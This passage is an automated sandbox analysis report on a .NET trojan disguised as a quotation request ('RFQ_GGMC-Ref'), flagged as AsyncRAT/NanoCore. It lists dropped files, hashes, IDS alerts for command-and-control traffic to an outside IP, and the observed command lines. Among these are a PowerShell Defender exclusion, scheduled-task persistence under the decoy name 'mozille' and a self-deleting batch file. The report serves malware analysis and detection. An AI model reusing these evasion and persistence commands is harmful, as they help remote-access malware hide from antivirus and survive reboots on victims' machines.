                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                    C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):154
                                                                    Entropy (8bit):5.030771528412489
                                                                    Encrypted:false
                                                                    SSDEEP:3:mKDDCMNqTtvL5oWXp5cViE2J5xAIjkOAdLvmqRDWXp5cViE2J5xAInTRINjio5Z6:hWKqTtT6WXp+N23fjdCvmq1WXp+N23fb
                                                                    MD5:07BDDF3468F5B8BEAFB3C3BFAA8E4C3D
                                                                    SHA1:92D16205F5D6F7B4CDFAD83119A5E47A8F430DB8
                                                                    SHA-256:7704F72B9FD7E75BDD3D3C8632B4F332120E94C1B8CAD84B6F62C2B63CEADD2C
                                                                    SHA-512:C10E87D75A658380DD96B9B7A94201C342BADEB4AE400B88CD21D72CBF76865307A1A5A645D6B36A9E4ECDB7FFADBAC212E97B4F0E5DE25C98B14B84AE0685C6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: @echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Local\Temp\mozille.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpB8D1.tmp.bat" /f /q..
                                                                    C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
                                                                    Process:C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1600
                                                                    Entropy (8bit):5.151412589996552
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtXxvn:cge4MYrFdOFzOzN33ODOiDdKrsuThv
                                                                    MD5:C286A082609C1C1A219FF01B51775164
                                                                    SHA1:F8A15ACBF3A55AD917F35566777A6EC4731DE800
                                                                    SHA-256:8ED2C4AF8E80335DE493A0A74226839E5505BA01BFD742C9A56A296878D9D636
                                                                    SHA-512:2FD055314D57E399D6CBB5FAFC7B98AD0910AD3D82F01A531C08EE36E8384FF1B86A6656741AE4C0E59E818EFFB92398BDF54ED7DADB7D0AA911982AA211A9E5
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                    C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):567808
                                                                    Entropy (8bit):7.627302244469304
                                                                    Encrypted:false
                                                                    SSDEEP:12288:3v5+Ky22SH/s6TYnPEvvslosxkhoNB3Ps7hZJ:/029/enPEHkowNB/S
                                                                    MD5:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    SHA1:A43016FA816AFD1693FB7F266DD032FD7F061C35
                                                                    SHA-256:B586CA95BA9557F7AD2434D01F96FF191B77541670894DF3B78AA3A8312AE092
                                                                    SHA-512:0B87028C9E9654BC3FC69797E9B241604C1A6266DF388E8E01CCE98F19507F5544B35AFD02462E2229D4F4C9B8D348AB9A0294B1802F98D6F80F608657BC7675
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.a................................. ........@.. ....................... ............@....................................K.......T............................................................................ ............... ..H............text...4.... ...................... ..`.sdata..............................@....rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe:Zone.Identifier
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                    C:\Users\user\Documents\20220112\PowerShell_transcript.138727.F_iUYR88.20220112090240.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5801
                                                                    Entropy (8bit):5.4133657955498915
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZZhENMqDo1Z4ZUhENMqDo1ZsOI2jZohENMqDo1ZermmOZ1:c
                                                                    MD5:A60FA78FF988D57F3451E409235D01C5
                                                                    SHA1:ACE6418390C2687EC72117DD8A11F25FC9D830B2
                                                                    SHA-256:DC0A2EB75B913C1FD7C28E211C0045E678AC5D659706AFBF63967569CA69ED15
                                                                    SHA-512:7AACF764D22856EC2EB7773B26E7559A4DC20278BDE3BD689EE288956AA9A06A95886EE10DCF447C7CDB94396FE4C560C97E847BEE16D3B45C214236BE466CC7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20220112090242..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe..Process ID: 5400..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220112090242..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe..**********************..Windows PowerShell transcript start..Start time: 20220112090441..Username: computer\user..RunAs User: DESKTOP-716T77
                                                                    C:\Users\user\Documents\20220112\PowerShell_transcript.138727.fhx+G1tL.20220112090212.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5801
                                                                    Entropy (8bit):5.41379343008454
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZvhENVqDo1ZuZshENVqDo1ZEOI2jZPhENVqDo1ZnrmmOZ1:T
                                                                    MD5:5DB6DDA4F50FC48388AEB9886E8D92FA
                                                                    SHA1:1B375170354A7D83E1E9478A93C8A17ED180E735
                                                                    SHA-256:F26C8CA471D97986F5C2DC5DA82BBCA9DA4C4EAEBC5EFB88917BD5D88403A7ED
                                                                    SHA-512:0ABC022E484CC6A00878DDD0B92A7D445C930C5DE61085961CB9A30DDB1E4FDE2484294EF36252566E52AD2C5389185724F8EBEA476364255DB84D2BBBEDEE4B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20220112090213..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 138727 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe..Process ID: 6080..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220112090213..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe..**********************..Windows PowerShell transcript start..Start time: 20220112090526..Username: computer\user..RunAs User: DESKTOP-716T77
                                                                    \Device\Null
                                                                    Process:C:\Windows\SysWOW64\timeout.exe
                                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.41440934524794
                                                                    Encrypted:false
                                                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.627302244469304
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                    File name:RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File size:567808
                                                                    MD5:9fd45110bad75cda6de67232014aeb6e
                                                                    SHA1:a43016fa816afd1693fb7f266dd032fd7f061c35
                                                                    SHA256:b586ca95ba9557f7ad2434d01f96ff191b77541670894df3b78aa3a8312ae092
                                                                    SHA512:0b87028c9e9654bc3fc69797e9b241604c1a6266df388e8e01cce98f19507f5544b35afd02462e2229d4f4c9b8d348ab9a0294b1802f98d6f80f608657bc7675
                                                                    SSDEEP:12288:3v5+Ky22SH/s6TYnPEvvslosxkhoNB3Ps7hZJ:/029/enPEHkowNB/S
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.a................................. ........@.. ....................... ............@................................

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x48b82e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x61DE32FE [Wed Jan 12 01:46:38 2022 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]

                                                                    Data Directories

                                                                    Name                                  Virtual Address  Virtual Size  Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT          0x8b7e0          0x4b          .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8e000          0x554         .rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0x90000          0xc           .reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x8b788          0x1c          .text
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                    Sections

                                                                    Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                                    .text   0x2000           0x89834       0x89a00   False     0.843022678247   data       7.64899477975   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .sdata  0x8c000          0x204         0x400     False     0.458984375      data       4.099059951     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .rsrc   0x8e000          0x554         0x600     False     0.340494791667   data       2.80510503091   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc  0x90000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    Name           RVA      Size   Type                  Language  Country
                                                                    RT_ICON        0x8e0e8  0xb0   GLS_BINARY_LSB_FIRST
                                                                    RT_GROUP_ICON  0x8e198  0x14   data
                                                                    RT_VERSION     0x8e1ac  0x3a8  data

                                                                    Imports

                                                                    DLL          Import
                                                                    mscoree.dll  _CorExeMain

                                                                    Version Infos

                                                                    Description       Data
                                                                    Translation       0x0000 0x04b0
                                                                    LegalCopyright    Copyright micolous 2006-2007
                                                                    Assembly Version  0.1.6.0
                                                                    InternalName      IDescriptionMetadataEnt.exe
                                                                    FileVersion       0.1.6.0
                                                                    CompanyName       micolous
                                                                    LegalTrademarks
                                                                    Comments
                                                                    ProductName       IGA Ad Cache Editor
                                                                    ProductVersion    0.1.6.0
                                                                    FileDescription   IGA Ad Cache Editor
                                                                    OriginalFilename  IDescriptionMetadataEnt.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    Timestamp                 Protocol  SID      Message                                                    Source Port  Dest Port  Source IP      Dest IP
                                                                    01/12/22-09:02:52.180734  TCP       2030673  ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)   5512         49720      89.238.150.43  192.168.2.3
                                                                    01/12/22-09:04:02.052703  TCP       2025019  ET TROJAN Possible NanoCore C2 60B                         49729        5512       192.168.2.3    89.238.150.43
                                                                    01/12/22-09:04:10.617296  TCP       2025019  ET TROJAN Possible NanoCore C2 60B                         49730        5512       192.168.2.3    89.238.150.43

                                                                    Network Port Distribution

                                                                    TCP Packets


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior


                                                                    System Behavior

                                                                    General

                                                                    Start time:09:02:00
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe"
                                                                    Imagebase:0x390000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:09:02:10
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                                                                    Imagebase:0x50000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:11
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:11
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
                                                                    Imagebase:0x1010000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:13
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:13
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Imagebase:0x160000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low

                                                                    General

                                                                    Start time:09:02:16
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    Imagebase:0x580000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:09:02:29
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit
                                                                    Imagebase:0xd80000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:29
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:29
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
                                                                    Imagebase:0xd80000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:30
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"'
                                                                    Imagebase:0x1010000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:09:02:30
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:09:02:31
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout 3
                                                                    Imagebase:0x320000
                                                                    File size:26112 bytes
                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:09:02:31
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    Imagebase:0x260000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:09:02:36
                                                                    Start date:12/01/2022
                                                                    Path:C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\mozille.exe"
                                                                    Imagebase:0xf10000
                                                                    File size:567808 bytes
                                                                    MD5 hash:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmp, Author: Joe Security

                                                                    General

                                                                    Start time:09:02:38
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                                                                    Imagebase:0x50000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET

                                                                    General

                                                                    Start time:09:02:39
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7f20f0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:09:02:39
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
                                                                    Imagebase:0x1010000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:09:02:40
                                                                    Start date:12/01/2022
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                                                                    Imagebase:0x2d0000
                                                                    File size:430592 bytes
                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
